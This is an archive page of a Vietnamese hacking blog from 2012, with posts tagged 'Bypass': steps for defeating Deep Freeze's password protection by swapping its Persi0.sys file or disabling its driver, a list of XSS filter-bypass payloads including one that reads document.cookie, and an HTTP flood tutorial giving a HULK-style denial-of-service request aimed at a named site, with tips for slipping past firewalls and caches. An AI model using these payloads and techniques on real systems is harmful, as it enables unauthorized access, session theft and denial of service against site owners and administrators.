Teamview có kèm ngôn ngữ Việt
http://www.teamviewer.com/download/T...r_Setup_vi.exe
Sau khi cài đặt:
Đọc thêm »
Hiển thị các bài đăng có nhãn Bypass. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Bypass. Hiển thị tất cả bài đăng
Thứ Bảy, 3 tháng 11, 2012
Thêm cách vượt rào Deep Freeze (Mọi phiên bản)
Khi cài DF lên máy, thường tạo một file tên Persi0.sys (hoặc $Persi0.sys). File này lưu thông tin về mật khẩu, cấu hình DF và được bảo vệ trong môi trường Window thực.
Ý tưởng là thay thế file Persi0.sys (ở máy cài DF, có đặt mật khẩu bảo vệ) bởi file Persi0.sys (do mình tạo, chưa đặt mật khẩu). Hai file này được tạo cùng một phiên bản DeepFreeze.
Đọc thêm »
Ý tưởng là thay thế file Persi0.sys (ở máy cài DF, có đặt mật khẩu bảo vệ) bởi file Persi0.sys (do mình tạo, chưa đặt mật khẩu). Hai file này được tạo cùng một phiên bản DeepFreeze.
Đọc thêm »
Mở băng DeepFreeze bằng tay
Với 1 máy đã được cài DeepFreeze. Nếu ở chế độ mở băng ta có thể thay đổi bình thường, gỡ bỏ chương trình... Với chế độ đóng băng ta không thể làm gì được. Chương trình DeepFreeze khởi động 1 Driver tên DeepFrz để đóng băng, muốn vô hiệu hóa đóng băng ta sẽ phải tiến hành vô hiệu hóa Driver đó từ HĐH khác.
Đọc thêm »
Đọc thêm »
Thứ Bảy, 27 tháng 10, 2012
Bypass XSS filters
Đa số các "bộ lọc" sẽ sử dụng cách cơ bản nhất là chặn các thẻ <script></script>.
Chúng ta sẽ cùng xem một số VD sau:
+Sử dụng các thuộc tính của các thẻ html:
+Sử dụng thuộc tính SRC:
+Sử dụng URI đã được encode base64
Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html
Chúng ta sẽ cùng xem một số VD sau:
+Sử dụng các thuộc tính của các thẻ html:
<body onload=alert('test1')>
<b onmouseover=alert('Wufff!')>click me!</b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
+Sử dụng thuộc tính SRC:
<IMG SRC=javascript:alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">Encode nội dung (UTF-8)
<IMG SRC=javascript:alert('XSS')>
+Sử dụng URI đã được encode base64
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">
Chú ý: một số code có thể không chạy được trên một số trình duyệt.
Đây chỉ là một ít trong số rất nhiều cách thực thi các đoạn mã javascript
Các bạn có thể tham khảo thêm tại: http://ha.ckers.org/xss.html
Thứ Sáu, 26 tháng 10, 2012
[TUT] HTTP Flood site HTML và 1 số site không cho connection = keep-alive
Cách dùng > thay user agent , thay host name thay Referer, thay random char > ném vào webhunter.
1.Thực tế nó là request của HULK dos tool @@ tut by hisoka @@ lech ghi với nhé
Trích:
GET /?ASH=REHRKP HTTP/1.1
Accept-Encoding: identity
Host: huydiet.vn
Keep-Alive: 110
User-Agent: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://www.google.com/?q=VUCWJE
Cache-Control: no-cache
> random char
>>Keep-Alive: 110 nên set thấp xuống tùy server conf
>>acces từ công cụ tìm kiếm.1 cách qua FW hiệu quả
>> Connection: close > close còn lâu mới nói
>>bypass cache
Đăng ký:
Bài đăng (Atom)